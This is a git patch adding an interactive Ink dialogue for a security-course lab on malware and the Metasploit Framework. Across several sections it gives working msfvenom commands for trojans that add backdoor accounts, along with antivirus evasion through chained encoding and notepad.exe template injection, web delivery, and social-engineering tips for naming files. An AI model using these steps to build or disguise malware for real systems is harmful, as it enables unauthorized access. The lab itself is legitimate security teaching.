From fbcc23b375b2fc214e5fb9c887e14cf30da95885 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Add GBL malware and Metasploit Framework lab sheet --- .../ink/lab_sheets/malware_metasploit.ink | 654 ++++++++++++++++++ 1 file changed, 654 insertions(+) create mode 100644 story_design/ink/lab_sheets/malware_metasploit.ink diff --git a/story_design/ink/lab_sheets/malware_metasploit.ink b/story_design/ink/lab_sheets/malware_metasploit.ink new file mode 100644 index 0000000..48813b3 --- /dev/null +++ b/story_design/ink/lab_sheets/malware_metasploit.ink @@ -0,0 +1,654 @@ +// =========================================== +// MALWARE AND METASPLOIT LAB +// Introduction to Malware and Payloads +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/2_malware_msf_payloads.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 +VAR ethical_awareness = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. + +Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. + +Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. + +* [Understood - authorized testing only] + ~ ethical_awareness += 15 + You: Clear. Authorized environments, defensive purpose, professional responsibility. + Malware Specialist: Excellent. Let's proceed. + -> malware_hub +* [I understand the constraints] + ~ ethical_awareness += 5 + You: I understand the ethical boundaries. + Malware Specialist: Good. Keep that in mind throughout. + -> malware_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== malware_hub === +Malware Specialist: What aspect of malware and Metasploit would you like to explore? + ++ [Types of malware and classifications] + -> malware_types ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Creating payloads with msfvenom] + -> msfvenom_basics ++ [Anti-malware detection methods] + -> antimalware_detection ++ [Evasion techniques and polymorphic malware] + -> evasion_techniques ++ [Remote Access Trojans (RATs)] + -> rat_intro ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// MALWARE TYPES +// =========================================== + +=== malware_types === +~ instructor_rapport += 5 + +Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. + +Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." + +Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. + +* [What are the main types?] + You: How is malware classified? + -> malware_taxonomy +* [Why target Windows most?] + You: Why is Windows the primary target? + Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. + Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. + Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. + ~ instructor_rapport += 5 + -> malware_types +* [Understood] + -> malware_hub + +=== malware_taxonomy === +~ instructor_rapport += 8 + +Malware Specialist: Main classifications: + +Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +- Doesn't self-propagate +- May provide remote access (RAT - Remote Access Trojan) +- May spy on users (spyware, keyloggers) +- May force advertising (adware) + +Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. + +Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. + +Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. + +Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. + +Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. + +* [Tell me more about Trojans] + You: Trojans seem most relevant to this lab? + Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. + Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. + ~ instructor_rapport += 8 + -> malware_hub +* [How do these overlap?] + You: Can malware be multiple types? + Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example. + Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. + Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. + ~ instructor_rapport += 10 + -> malware_hub +* [Got it] + -> malware_hub + +// =========================================== +// METASPLOIT FRAMEWORK +// =========================================== + +=== metasploit_intro === +~ instructor_rapport += 5 + +Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. + +Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. + +Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. + +Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. + +* [What can Metasploit do?] + You: What's the scope of Metasploit's capabilities? + Malware Specialist: Enormous scope: + - Exploit development and execution + - Payload generation (what we're focusing on) + - Post-exploitation (once you've compromised a system) + - Auxiliary modules (scanners, sniffers, fuzzers) + - Evasion and anti-forensics + ~ instructor_rapport += 8 + -> metasploit_intro +* [Why is it legal to distribute?] + You: How is this legal if it creates malware? + ~ ethical_awareness += 10 + Malware Specialist: Excellent question. Shows good critical thinking. + Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. + Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. + ~ instructor_rapport += 15 + -> metasploit_intro +* [Tell me about payloads] + You: What exactly is a payload? + -> payload_explanation +* [Back to main menu] + -> malware_hub + +=== payload_explanation === +~ instructor_rapport += 8 + +Malware Specialist: Payload - the malicious code you want to execute on a victim's system. + +Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. + +Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. + +Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. + +* [How do I see available payloads?] + You: How many payloads exist? + Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. + Malware Specialist: Platform-specific: windows, linux, osx, android, etc. + Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. + Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. + ~ instructor_rapport += 5 + -> payload_explanation +* [What's the simplest payload?] + You: What's a basic example? + Malware Specialist: `windows/adduser` - simply adds a user account to Windows. + Malware Specialist: Configuration: USER= (username), PASS= (password) + Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ instructor_rapport += 5 + -> payload_explanation +* [Understood] + -> metasploit_intro + +// =========================================== +// MSFVENOM BASICS +// =========================================== + +=== msfvenom_basics === +~ instructor_rapport += 5 + +Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. + +Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. + +Malware Specialist: Basic workflow: +1. Choose payload +2. Configure options +3. Select output format +4. Generate file + +* [Walk me through creating a Trojan] + You: Show me the complete process. + -> trojan_creation_walkthrough +* [What output formats exist?] + You: What formats can msfvenom generate? + Malware Specialist: `msfvenom -l formats` lists them all. + Malware Specialist: Common formats: + - exe: Windows executable + - elf: Linux executable + - dll: Windows library + - python, ruby, perl: Scripts in various languages + - c, java: Source code + - raw: Raw shellcode + Malware Specialist: Choose format based on target platform and delivery method. + ~ instructor_rapport += 8 + -> msfvenom_basics +* [How do I configure payloads?] + You: What about payload options? + Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. + Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. + Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ instructor_rapport += 5 + -> msfvenom_basics +* [Back to main menu] + -> malware_hub + +=== trojan_creation_walkthrough === +~ instructor_rapport += 10 + +Malware Specialist: Complete Trojan creation example: + +Malware Specialist: **Step 1:** Choose payload +`msfvenom -l payloads | grep windows/adduser` + +Malware Specialist: **Step 2:** Check options +`msfvenom -p windows/adduser --list-options` + +Malware Specialist: **Step 3:** Generate executable +`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` + +Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +`sudo cp game.exe /var/www/html/share/` +`sudo service apache2 start` + +Malware Specialist: **Step 5:** Victim downloads and runs game.exe +(Social engineering: "Free game! Click to play!") + +Malware Specialist: **Step 6:** Verify success +On victim system: `net user` shows new backdoor account + +Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. + +* [How do I make it less suspicious?] + You: How do I make it seem legitimate? + Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ instructor_rapport += 10 + -> msfvenom_basics +* [What about detection?] + You: Won't anti-malware catch this? + Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + -> antimalware_detection +* [Clear walkthrough] + -> msfvenom_basics + +// =========================================== +// ANTI-MALWARE DETECTION +// =========================================== + +=== antimalware_detection === +~ instructor_rapport += 5 + +Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. + +Malware Specialist: Two main detection approaches: signature-based and anomaly-based. + +* [Explain signature-based detection] + You: How does signature-based detection work? + -> signature_based +* [Explain anomaly-based detection] + You: How does anomaly-based detection work? + -> anomaly_based +* [How do I test against anti-malware?] + You: How can I test my payloads? + Malware Specialist: ClamAV - open-source anti-malware scanner. + Malware Specialist: `clamscan` scans current directory for malware. + Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. + Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ instructor_rapport += 8 + -> antimalware_detection +* [Back to main menu] + -> malware_hub + +=== signature_based === +~ instructor_rapport += 8 + +Malware Specialist: Signature-based detection - blacklist of known malware patterns. + +Malware Specialist: **How it works:** +- Malware researchers analyze malicious code +- Extract unique signatures (byte patterns, hashes, code structures) +- Add to signature database +- Scanner compares files against database + +Malware Specialist: **Advantages:** +- High accuracy for known threats +- Low false positive rate +- Resource efficient +- Mature, well-understood technology + +Malware Specialist: **Disadvantages:** +- Useless against unknown malware (zero-days) +- Requires constant signature updates +- Polymorphic malware can evade (same function, different code) +- Always reactive, never proactive + +* [How do hashes relate to signatures?] + ~ instructor_rapport += 10 + You: You mentioned hashes earlier? + Malware Specialist: Simple signature approach: hash the entire malware file. + Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. + Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. + Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. + Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. + ~ instructor_rapport += 10 + -> signature_based +* [Understood] + -> antimalware_detection + +=== anomaly_based === +~ instructor_rapport += 8 + +Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. + +Malware Specialist: **How it works:** +- Establish baseline of normal system behavior +- Monitor processes, registry changes, network connections, file access +- Flag deviations from normal as potentially malicious +- May use machine learning, heuristics, behavioral analysis + +Malware Specialist: **Advantages:** +- Detects unknown threats (zero-days) +- Adapts to new attack methods +- More comprehensive than signature matching +- Less dependent on frequent updates + +Malware Specialist: **Disadvantages:** +- False positives (legitimate software flagged) +- Complex implementation and tuning +- Resource intensive (continuous monitoring) +- Difficult to establish baseline (what's "normal"?) + +* [Give me an example] + You: What behaviors trigger anomaly detection? + Malware Specialist: Suspicious patterns: + - Process creating multiple network connections + - Modification of system files + - Injection into other processes + - Encryption of large numbers of files (ransomware behavior) + - Keylogging-like keyboard hooks + - Persistence mechanisms (registry keys, startup folders) + Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ instructor_rapport += 10 + -> anomaly_based +* [Which is better?] + You: Which detection method is superior? + Malware Specialist: Both. Modern anti-malware uses layered approach. + Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Malware Specialist: No single method is perfect. Combine multiple for better coverage. + ~ instructor_rapport += 10 + -> anomaly_based +* [Got it] + -> antimalware_detection + +// =========================================== +// EVASION TECHNIQUES +// =========================================== + +=== evasion_techniques === +~ instructor_rapport += 5 + +Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. + +Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. + +Malware Specialist: Goal: change how malware looks without changing what it does. + +* [Explain encoding] + You: How does encoding help evasion? + -> encoding_evasion +* [Explain template injection] + You: What's template injection? + -> template_injection +* [What's polymorphic malware?] + You: You mentioned polymorphic malware earlier? + Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. + Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. + ~ instructor_rapport += 10 + -> evasion_techniques +* [Back to main menu] + -> malware_hub + +=== encoding_evasion === +~ instructor_rapport += 10 + +Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. + +Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` + +Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) + +Malware Specialist: Usage: +`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` + +Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) + +* [Does more encoding help?] + You: Is 10 iterations better than 1? + Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ instructor_rapport += 8 + -> encoding_evasion +* [Can I chain encoders?] + You: Can I use multiple different encoders? + Malware Specialist: Absolutely. Pipe msfvenom outputs: + `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` + Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. + Malware Specialist: Though again, modern AV looks deeper than surface encoding. + ~ instructor_rapport += 10 + -> encoding_evasion +* [Understood] + -> evasion_techniques + +=== template_injection === +~ instructor_rapport += 10 + +Malware Specialist: Template injection - embedding payload inside legitimate executable. + +Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. + +Malware Specialist: msfvenom `-x` flag specifies template executable: +`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` + +Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). + +* [Why is this effective?] + You: How does this evade detection? + Malware Specialist: Several reasons: + - File structure resembles legitimate program + - Contains real code from original program + - Signature scanners see legitimate program signatures too + - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious + Malware Specialist: Not perfect, but more effective than bare encoded payload. + ~ instructor_rapport += 10 + -> template_injection +* [What programs make good templates?] + You: Which programs should I use as templates? + Malware Specialist: Context-dependent. Match victim's expectations: + - Games for game-focused social engineering + - Utilities (calc.exe, notepad.exe) for general purpose + - Industry-specific software for targeted attacks + Malware Specialist: Smaller files better (less suspicious download size). + Malware Specialist: Legitimate signed programs add credibility. + ~ instructor_rapport += 8 + -> template_injection +* [Can I combine encoding and templates?] + You: Can I use both techniques together? + Malware Specialist: Absolutely recommended. Encode first, then inject into template: + `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` + Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. + Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. + ~ instructor_rapport += 10 + -> template_injection +* [Got it] + -> evasion_techniques + +// =========================================== +// REMOTE ACCESS TROJANS +// =========================================== + +=== rat_intro === +~ instructor_rapport += 5 + +Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. + +Malware Specialist: Classic architecture: client-server model. +- Server (victim runs this): listens for connections, executes commands +- Client (attacker uses this): connects to server, sends commands + +Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. + +* [How do RATs differ from what we've done?] + You: How is this different from adduser payload? + Malware Specialist: adduser is single-action. Runs once, adds user, exits. + Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. + Malware Specialist: More powerful, more flexible, more risk if detected. + ~ instructor_rapport += 8 + -> rat_intro +* [What Metasploit payloads create RATs?] + You: Which payloads provide remote access? + Malware Specialist: Several options: + - windows/meterpreter/reverse_tcp - full-featured RAT + - windows/shell/reverse_tcp - simple command shell + - windows/vnc/reverse_tcp - graphical remote access + Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. + Malware Specialist: Reverse shells covered in later labs. Advanced topic. + ~ instructor_rapport += 8 + -> rat_intro +* [Why "reverse"?] + You: What does "reverse" mean in reverse_tcp? + Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). + Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. + Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. + ~ instructor_rapport += 10 + -> rat_intro +* [Understood] + -> malware_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Malware Specialist: Quick reference for Metasploit and malware-related commands: + +Malware Specialist: **msfvenom basics:** +- List payloads: `msfvenom -l payloads` +- List encoders: `msfvenom -l encoders` +- List formats: `msfvenom -l formats` +- Show options: `msfvenom -p payload_name --list-options` + +Malware Specialist: **Creating payloads:** +- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` +- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` +- With template: `msfvenom -p payload -x template.exe -f exe > output.exe` +- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` + +Malware Specialist: **Testing payloads:** +- Hash file: `sha256sum filename.exe` +- Scan with ClamAV: `clamscan` +- Scan specific file: `clamscan filename.exe` + +Malware Specialist: **Web server (payload delivery):** +- Create share directory: `sudo mkdir /var/www/html/share` +- Copy payload: `sudo cp malware.exe /var/www/html/share/` +- Start Apache: `sudo service apache2 start` +- Access from victim: http://KALI_IP/share/malware.exe + +Malware Specialist: **Windows victim verification:** +- List users: `net user` +- Check specific user: `net user username` + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +Malware Specialist: Practical tips for lab challenges: + +Malware Specialist: **Creating effective Trojans:** +- Start simple (windows/adduser or windows/exec) +- Test unencoded version first to ensure payload works +- Then add encoding, check if detection increases +- Finally try template injection for best evasion + +Malware Specialist: **Evasion tips:** +- Experiment with different encoders and iteration counts +- Shikata_ga_nai is popular but widely signatured - try others +- Chain multiple encoders for better results +- Use legitimate programs as templates (notepad, calc, small utilities) +- Test against ClamAV before trying against victim +- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) + +Malware Specialist: **Delivery tips:** +- Make filename convincing (game.exe, important_document.exe, update.exe) +- Social engineering matters - victim needs reason to run it +- In real scenarios: icons, file properties, code signing all add legitimacy +- For lab: simple web delivery works fine + +Malware Specialist: **Verification:** +- Windows: `net user` shows created accounts +- Check Admin group: `net localgroup administrators` +- If payload fails, check syntax and password complexity requirements +- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) + +Malware Specialist: **Troubleshooting:** +- Payload doesn't work? Test simpler version without encoding +- Still detected by AV? Try different template or more encoding iterations +- Apache won't start? `sudo service apache2 status` for error info +- Can't download from Kali? Check IP address (`ip a`) and firewall rules + +{instructor_rapport >= 50: + Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. +} + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Malware Specialist: Good. You've covered the core concepts. + +Malware Specialist: Lab objectives: +1. Create basic Trojan using msfvenom +2. Test against anti-malware (ClamAV) +3. Use encoding to evade detection +4. Inject payload into legitimate program template +5. Deliver via web server to Windows victim +6. Verify successful exploitation + +{ethical_awareness >= 10: + Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. +} + +Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. + +Malware Specialist: But also by criminals. The difference is authorization and intent. + +Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. + +Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. + +Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. + +#exit_conversation +-> END